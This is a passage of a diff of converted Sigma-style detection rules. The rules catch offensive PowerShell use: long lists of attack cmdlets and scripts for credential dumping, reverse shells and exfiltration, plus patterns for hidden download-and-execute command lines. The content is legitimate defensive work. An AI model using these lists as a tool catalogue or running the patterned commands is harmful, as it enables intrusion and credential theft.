'%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE 